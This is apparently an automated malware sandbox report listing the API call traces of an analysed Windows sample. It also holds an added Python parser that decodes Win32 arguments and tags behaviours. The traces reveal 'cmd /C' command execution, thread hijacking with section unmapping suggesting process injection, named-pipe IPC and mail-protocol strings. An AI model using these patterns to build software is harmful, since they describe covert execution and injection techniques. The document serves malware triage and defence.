  • HeapFree.KERNEL32(00000000,00000000), ref: 001C163F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 8
  • API ID: CreateProcessGetExitCodeProcessGetLastErrorWaitForMultipleObjectslstrlenmemsetwcstombs
  • String ID: D$cmd /C "%s> %s1"
  • API String ID: 1537746708-2226621151
  • Opcode ID: 8f43a44b104833d0f96806934345d3a8753fb5f9a1b6580f8a9b41b9e07b006e
  • Instruction ID: 189f0c3c70cc7b6004f2ba7acf1b9f38675443b636e617586de16067a78319dd
  • Opcode Fuzzy Hash: 3EF0C02508CBD197D4C33468270174BEA16AF211D2C4D6B91A6806A1885F0075D2575B
  • Instruction Fuzzy Hash: 189f0c3c70cc7b6004f2ba7acf1b9f38675443b636e617586de16067a78319dd
APIs
  • memset.NTDLL ref: 001C743A
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
  • wcstombs.NTDLL ref: 001C747D
  • CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
  • GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
  • GetLastError.KERNEL32 ref: 001C7507
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 60
  • API ID: HeapFree$lstrlenmemcpy$RtlAllocateHeapSwitchToThreadlstrcpy
  • String ID:
  • API String ID: 732536130-0
  • Opcode ID: a427ae31280889244c8d76e620d9b5f9788be67866348582a82e8a58517c2dc5
  • Instruction ID: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
  • Opcode Fuzzy Hash: 90116D11582D32C3D113B46AC1E8B7EFA45FF961D6C1F3001E9127510E4A935EF6AB6E
  • Instruction Fuzzy Hash: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
APIs
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • lstrlen.KERNEL32(?,?,?,00000001), ref: 001C216D
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C218F
  • lstrcpy.KERNEL32(00000020,?), ref: 001C21AE
  • lstrlen.KERNEL32(?), ref: 001C21B8
  • memcpy.NTDLL(?,?,?), ref: 001C21F9
  • memcpy.NTDLL(?,?,?), ref: 001C220C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C224F
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • SwitchToThread.KERNEL32(?,00000000,?,?), ref: 001C2230
    • Part of subcall function 001C2B66: memset.NTDLL ref: 001C2BCA
    • Part of subcall function 001C2B66: CloseHandle.KERNEL32(?), ref: 001C2C13
    • Part of subcall function 001C2B66: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2DC7
    • Part of subcall function 001C2B66: GetLastError.KERNEL32(?,00000000,?), ref: 001C3013
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2275
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2291
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 83
  • API ID: CloseHandleGetLastError$ConnectNamedPipeCreateEventDisconnectNamedPipeFlushFileBuffersWaitForMultipleObjectsWaitForSingleObject
  • String ID:
  • API String ID: 4178450735-0
  • Opcode ID: fea2056c6ced76e25bc66d29ae2c0ef00b9ab400e991bc076a25110f2a978033
  • Instruction ID: 05167e17d539e8951b2ec5fe1b97e76cff5c88daf7da0f392f1248a609e86f53
  • Opcode Fuzzy Hash: 34F07B324973A09BC12724748146BBA7A46FF612E7D8C7302ECB0B518E1F05A6F65369
  • Instruction Fuzzy Hash: 05167e17d539e8951b2ec5fe1b97e76cff5c88daf7da0f392f1248a609e86f53
APIs
  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 001CBBD2
  • ConnectNamedPipe.KERNEL32(?,?), ref: 001CBC02
  • GetLastError.KERNEL32 ref: 001CBC0C
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001CBC30
    • Part of subcall function 001CB978: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,001CBA84,00000008,?,00000010,00000001,00000000,0000012B), ref: 001CB997
    • Part of subcall function 001CB978: WriteFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9CB
    • Part of subcall function 001CB978: ReadFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9D3
    • Part of subcall function 001CB978: GetLastError.KERNEL32 ref: 001CB9DD
    • Part of subcall function 001CB978: WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 001CB9F9
    • Part of subcall function 001CB978: GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 001CBA12
    • Part of subcall function 001CB978: CancelIo.KERNEL32(?), ref: 001CBA27
    • Part of subcall function 001CB978: CloseHandle.KERNEL32(?), ref: 001CBA37
    • Part of subcall function 001CB978: GetLastError.KERNEL32 ref: 001CBA3F
  • CloseHandle.KERNEL32(?), ref: 001CBC9E
    • Part of subcall function 001CBB13: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CBB31
    • Part of subcall function 001CBB13: HeapFree.KERNEL32(00000000,00000000), ref: 001CBB84
  • FlushFileBuffers.KERNEL32(?), ref: 001CBC73
  • DisconnectNamedPipe.KERNEL32(?,?,?,00000010,00000000), ref: 001CBC7C
  • WaitForSingleObject.KERNEL32(001EB094,00000000), ref: 001CBC89
  • GetLastError.KERNEL32 ref: 001CBCAB
  • CloseHandle.KERNEL32(?), ref: 001CBCB8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 62
  • API ID: CloseHandle$LocalFreeRtlDeleteCriticalSectionRtlEnterCriticalSectionRtlLeaveCriticalSectionSetEventSleepWaitForSingleObject
  • String ID:
  • API String ID: 1546928802-0
  • Opcode ID: 44cbb82d1bc8bc2d29e416fe044868003d437d2d6ba21b65bae40637e45a7bca
  • Instruction ID: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
  • Opcode Fuzzy Hash: 18E02BA421196647D99708B00461B1FAE82BBE23E484C3303F552A25C2BB0712C4DF2A
  • Instruction Fuzzy Hash: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
APIs
  • SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
  • CloseHandle.KERNEL32(?), ref: 001DB86F
  • CloseHandle.KERNEL32(?), ref: 001DB87D
  • RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
  • RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
  • Sleep.KERNEL32(000001F4), ref: 001DB8C1
  • CloseHandle.KERNEL32(?), ref: 001DB8CE
  • LocalFree.KERNEL32(?), ref: 001DB8DC
  • RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 23
  • API ID: LocalFreelstrcatlstrcpymemcpy
  • String ID: IMAP$P$POP3$SMTP
  • API String ID: 2001391702-3667654339
  • Opcode ID: 43434d26df3a4f5d7c34ecf30ecc38ca90c9099c92fdaea40e4787011e532f06
  • Instruction ID: 6478c962306ff3ebee45f1e70cc600bc5173ee11dde7fe85537008a4b3b65a8d
  • Opcode Fuzzy Hash: 3911AF310449E3F79AAB229950026AB81429F117E2E5C9B21ED7C785CF6F03B14B770D
  • Instruction Fuzzy Hash: 6478c962306ff3ebee45f1e70cc600bc5173ee11dde7fe85537008a4b3b65a8d
APIs
  • lstrcpyW.KERNEL32(00000000,001ED5A0), ref: 001DF84B
  • lstrcatW.KERNEL32(00000000,00000000), ref: 001DF853
  • memcpy.NTDLL(00000000,?,00000000,-00000002), ref: 001DF8F1
  • LocalFree.KERNEL32(?,-00000002), ref: 001DF908
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
    • Part of subcall function 001D93F1: lstrlenW.KERNEL32(00000000,00000000,001EAC44), ref: 001D9401
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: GetLastError$VirtualAlloc$RtlEnterCriticalSectionRtlLeaveCriticalSectionSwitchToThread
  • String ID:
  • API String ID: 2452875170-0
  • Opcode ID: f7250d7c747c6724e85bc87f4a1d164c9bcb3d791413c0bfd27e5859a3665385
  • Instruction ID: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
  • Opcode Fuzzy Hash: F931CCA2419FC2A7D5936A400890BBAC5C3FB12FF6D6CA732B674A02C81FC5274D2F54
  • Instruction Fuzzy Hash: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
APIs
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB03B
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB05A
  • GetLastError.KERNEL32 ref: 001DB20B
  • GetLastError.KERNEL32 ref: 001DB28D
  • SwitchToThread.KERNEL32(?,?,?,?), ref: 001DB2D2
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • GetLastError.KERNEL32 ref: 001DB308
  • GetLastError.KERNEL32 ref: 001DB317
  • RtlEnterCriticalSection.NTDLL(?), ref: 001DB327
  • RtlLeaveCriticalSection.NTDLL(?), ref: 001DB338
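The per-function call lists in this report are the raw material for triage, but reading hex arguments by eye is slow. The following is an added example, not part of the Joe Sandbox report and not code from the analysed sample: a small Python parser for the report's "APIs" notation (bullet, optional "Part of subcall function", `Api.MODULE(args), ref: address`) that decodes a few of the arguments seen above with their Win32 constants from winnt.h/winbase.h (CreateFile access 0xC0000000 and disposition 3, VirtualAlloc 0x3000/0x4, registry hive 0x80000001, RtlAdjustPrivilege 0x13, CreateProcess flags 0x0C000000) and tags behaviours across one function's calls. The sample input is constructed from lines shown on this page; the tag names and rules are this example's own choices, not Joe Sandbox classifications. Arguments the sandbox could not resolve (`?`, `EMPTY`, string literals) are left undecoded.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample: a subset of the "APIs" lines above, in the report's own
# notation (bullet, optional "Part of subcall function", Api.MODULE(args), ref).
SAMPLE_TRACE = """\
  • CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 001C15E6
  • WriteFile.KERNEL32(00000000,00000000), ref: 001C1607
    • Part of subcall function 001C154D: RtlAdjustPrivilege.NTDLL(00000013,00000001,00000000,?), ref: 001C155B
  • GetTickCount.KERNEL32 ref: 001DDCFC
  • lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
  • CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB03B
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C17A8
"""

LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)

# Win32 constants (winnt.h / winbase.h) behind the hex arguments decoded below.
ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING", 4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
MEM_TYPE = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE"}
PROTECT = {0x04: "PAGE_READWRITE", 0x40: "PAGE_EXECUTE_READWRITE"}
HIVES = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER", 0x80000002: "HKEY_LOCAL_MACHINE"}
PRIVS = {19: "SeShutdownPrivilege", 20: "SeDebugPrivilege"}
PROC_FLAGS = {0x04000000: "CREATE_DEFAULT_ERROR_MODE", 0x08000000: "CREATE_NO_WINDOW"}
# (API name minus A/W suffix, argument index, label, table, bitmask?)
DECODERS = [
    ("CreateFile", 1, "access", ACCESS, True),
    ("CreateFile", 4, "disposition", DISPOSITION, False),
    ("VirtualAlloc", 2, "alloc", MEM_TYPE, True),
    ("VirtualAlloc", 3, "protect", PROTECT, False),
    ("RegOpenKey", 0, "hive", HIVES, False),
    ("RtlAdjustPrivilege", 0, "privilege", PRIVS, False),
    ("CreateProcess", 5, "flags", PROC_FLAGS, True),
]

@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: str                          # address of the call site
    subcall_of: Optional[str] = None  # enclosing function on "Part of subcall" lines

def stem(api: str) -> str:  # CreateFileA / CreateFileW -> CreateFile
    return api.rstrip("AW")

def parse_trace(text: str) -> List[ApiCall]:
    """Parse bullet lines; headers such as "APIs" or "Strings" are skipped."""
    calls: List[ApiCall] = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            raw = m.group("args")
            args = [a.strip() for a in raw.split(",")] if raw else []
            calls.append(ApiCall(m.group("api"), m.group("mod"), args, m.group("ref"), m.group("sub")))
    return calls

def arg_int(value: str) -> Optional[int]:
    try:
        return int(value, 16)
    except ValueError:  # '?', 'EMPTY' and string literals are not hex
        return None

def flag_names(value: int, table: Dict[int, str]) -> str:
    names = [name for bit, name in table.items() if value & bit == bit]
    return "|".join(names) if names else hex(value)

def decode(call: ApiCall) -> Dict[str, str]:
    """Symbolic names for the arguments DECODERS knows about."""
    out: Dict[str, str] = {}
    for name, idx, label, table, bitmask in DECODERS:
        v = arg_int(call.args[idx]) if stem(call.api) == name and idx < len(call.args) else None
        if v is not None:
            out[label] = flag_names(v, table) if bitmask else table.get(v, hex(v))
    return out

def triage(calls: List[ApiCall]) -> List[str]:
    """Behaviour tags (names chosen here, not Joe Sandbox's) for one function's calls."""
    decoded = [decode(c) for c in calls]
    stems = {stem(c.api) for c in calls}
    tags: List[str] = []
    if ("WriteFile" in stems and any("GENERIC_WRITE" in d.get("access", "") for d in decoded)
            and any(d.get("privilege") == "SeShutdownPrivilege" for d in decoded)):
        tags.append("file-write-with-shutdown-privilege")
    if "CreateProcess" in stems and any(a.startswith("cmd /C") for c in calls for a in c.args):
        tags.append("shell-command-exec")
    if stems & {"CallNamedPipe", "ConnectNamedPipe", "DisconnectNamedPipe"}:
        tags.append("named-pipe-ipc")
    return tags
```

Run `triage(parse_trace(text))` over the "APIs" list of each function record (the lines between one "APIs" header and the next "Memory Dump Source"); the `ref` field is the call-site address, so a tag can be taken straight back to the disassembly. The first rule is the one to look at for this sample: the function at 001C159D..001C163F opens a handle with GENERIC_READ|GENERIC_WRITE and OPEN_EXISTING after GetWindowsDirectoryA and StrChrA(':'), calls WriteFile, and its subcall 001C154D asks for privilege 0x13, which is SE_SHUTDOWN_PRIVILEGE (19). The report does not show what path the wsprintfA call builds, so the parser only flags the combination rather than naming the target.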
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: memcpy$RtlAllocateHeapmemset$HeapFreelstrcmpi
  • String ID:
  • API String ID: 2612869081-0
  • Opcode ID: c2dacee3140373e500c22aac8ec47d9c8ec65dfe813f0c9f26dc5badd2c4d201
  • Instruction ID: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
  • Opcode Fuzzy Hash: 4201C028044DC281C42710841061FF9A506EFD13B5C8CAB76DDA13F08B5D0273F53797
  • Instruction Fuzzy Hash: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,00000018,001ED278), ref: 001CAC70
  • memset.NTDLL ref: 001CAC81
  • lstrcmpi.KERNEL32(?,?), ref: 001CACC1
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CACEA
  • memcpy.NTDLL(00000000,?,?), ref: 001CACFE
  • memset.NTDLL ref: 001CAD0B
  • memcpy.NTDLL(?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD24
  • memcpy.NTDLL(-00000005,001EC42B,00000007,?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD3F
  • HeapFree.KERNEL32(00000000,?), ref: 001CAD5C
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: RtlAllocateHeaplstrlen$HeapFree_wcsuprlstrcatlstrcpymemcpy
  • String ID:
  • API String ID: 1573093752-0
  • Opcode ID: f08ef74051028bad1df3046b05b27150d2409501bab8048f9561d94f45d3640f
  • Instruction ID: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
  • Opcode Fuzzy Hash: F9F0FEB01D1901DB8023453EE06037DE502AC442E2B1C8617FD80B525F7F4372E0BF59
  • Instruction Fuzzy Hash: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
APIs
  • lstrlenW.KERNEL32(00000000), ref: 001CB606
  • RtlAllocateHeap.NTDLL(00000000,001EAC82), ref: 001CB61C
  • memcpy.NTDLL(00000000,00000000,001EAC80), ref: 001CB62F
  • _wcsupr.NTDLL ref: 001CB63A
  • lstrlenW.KERNEL32(?,001EAC80), ref: 001CB66C
  • RtlAllocateHeap.NTDLL(00000000,?,001EAC80), ref: 001CB681
  • lstrcpyW.KERNEL32(00000000,?), ref: 001CB697
  • lstrcatW.KERNEL32(00000000,001EC940), ref: 001CB6B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB6C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 33
  • API ID: lstrlen$CloseHandleDeleteFileHeapFreeMapViewOfFileRtlAllocateHeapUnmapViewOfFilewcstombs
  • String ID:
  • API String ID: 3071814901-0
  • Opcode ID: d05e3ff4273796c9b17326ba3024fd4693d54f1ec967c9ade7a5abc202e65e4f
  • Instruction ID: 7e783e8648c44d89f659e24c24dcd4eaacf23487424efcd1c96aaf08dceaf5d1
  • Opcode Fuzzy Hash: 8DF08B71654AC2CBD22778A6A6517BBF901FB532C3C4E3732DC40251681F4232D22B1B
  • Instruction Fuzzy Hash: 7e783e8648c44d89f659e24c24dcd4eaacf23487424efcd1c96aaf08dceaf5d1
APIs
    • Part of subcall function 001C7262: memset.NTDLL ref: 001C7284
    • Part of subcall function 001C7262: lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 001C72C8
    • Part of subcall function 001C7262: OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 001C730E
    • Part of subcall function 001C7262: CloseHandle.KERNEL32(?), ref: 001C7331
  • MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,?,?,?,?), ref: 001C4D32
  • CloseHandle.KERNEL32(?), ref: 001C4D3E
  • lstrlenW.KERNEL32(00000000), ref: 001C4D58
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C4D69
  • wcstombs.NTDLL ref: 001C4D7A
  • lstrlen.KERNEL32(?), ref: 001C4D87
    • Part of subcall function 001D9462: lstrlen.KERNEL32(-00000002,00000000,?,-00000002,-00000002,?,001C4D99), ref: 001D9472
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL ref: 001DDEA1
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,001EC117), ref: 001DDF4F
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDFC7
    • Part of subcall function 001DDE6F: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DE039
    • Part of subcall function 001DDE6F: lstrcpy.KERNEL32(00000000,00000000), ref: 001DE061
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,?), ref: 001DE06F
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,00000000), ref: 001DE07F
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE12C
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,001EB1C0), ref: 001DE176
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DE185
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE197
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000), ref: 001DE1AD
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?), ref: 001DE1BC
  • UnmapViewOfFile.KERNEL32(?,?,?,?,00000000,00000001), ref: 001C4DBC
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C4DCE
  • DeleteFileW.KERNEL32(?), ref: 001C4DDC
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 110
  • API ID: GetLastError$CancelIoCloseHandleCreateEventGetOverlappedResultReadFileWaitForMultipleObjectsWriteFile
  • String ID:
  • API String ID: 340323113-0
  • Opcode ID: c76374ab722defcc6b7910d2b5a917f55ad2d99158a8d4548ff4996c05cdb32e
  • Instruction ID: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
  • Opcode Fuzzy Hash: B7E05C3D03050183442319B00225F9BAF186F662C7A8C33E2FE84CD6975B01BBE58152
  • Instruction Fuzzy Hash: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,001CBA84,00000008,?,00000010,00000001,00000000,0000012B), ref: 001CB997
  • WriteFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9CB
  • ReadFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9D3
  • GetLastError.KERNEL32 ref: 001CB9DD
  • WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 001CB9F9
  • GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 001CBA12
  • CancelIo.KERNEL32(?), ref: 001CBA27
  • CloseHandle.KERNEL32(?), ref: 001CBA37
  • GetLastError.KERNEL32 ref: 001CBA3F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 97
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID: d
  • API String ID: 307323562-2564639436
  • Opcode ID: 3424cbb1137d2442c81198497add0441f4db132d4a2ce8cb8b6f8920268ef235
  • Instruction ID: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
  • Opcode Fuzzy Hash: 76018E064AAA7143C6022C158545FBAF186EB03FB9C5CF710D560304CE0B4574E1F669
  • Instruction Fuzzy Hash: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
APIs
  • memset.NTDLL ref: 001DC393
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
    • Part of subcall function 001D90C0: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D90ED
    • Part of subcall function 001D90C0: SetLastError.KERNEL32(00000000,?,001DC3F5,00000000,?,00010007,00000004,?), ref: 001D90F4
  • ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
  • SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001D909F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D90B7
    • Part of subcall function 001DC212: memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC212: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
    • Part of subcall function 001DC212: WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
    • Part of subcall function 001DC212: SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
  • ResumeThread.KERNEL32(00000004), ref: 001DC4D6
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 31
  • API ID: CreateDirectory$CopyFileHeapFreeRtlAllocateHeaplstrcpy
  • String ID: \sols
  • API String ID: 2898405644-25449109
  • Opcode ID: 5497166955076156837619a2a098418b7cb76563a9d137fec855e451e2c56df1
  • Instruction ID: 44ec2210092a92e039f9b1496625380036570e436bac4a4be39adbf8d21673e3
  • Opcode Fuzzy Hash: F2E0ABB50504208B9013D4B671183389C4698102F219D4511FB06BC48FAFD302A5FB6E
  • Instruction Fuzzy Hash: 44ec2210092a92e039f9b1496625380036570e436bac4a4be39adbf8d21673e3
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1BC4
  • lstrcpyW.KERNEL32(00000000,001C1DC2), ref: 001C1BD5
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1BEC
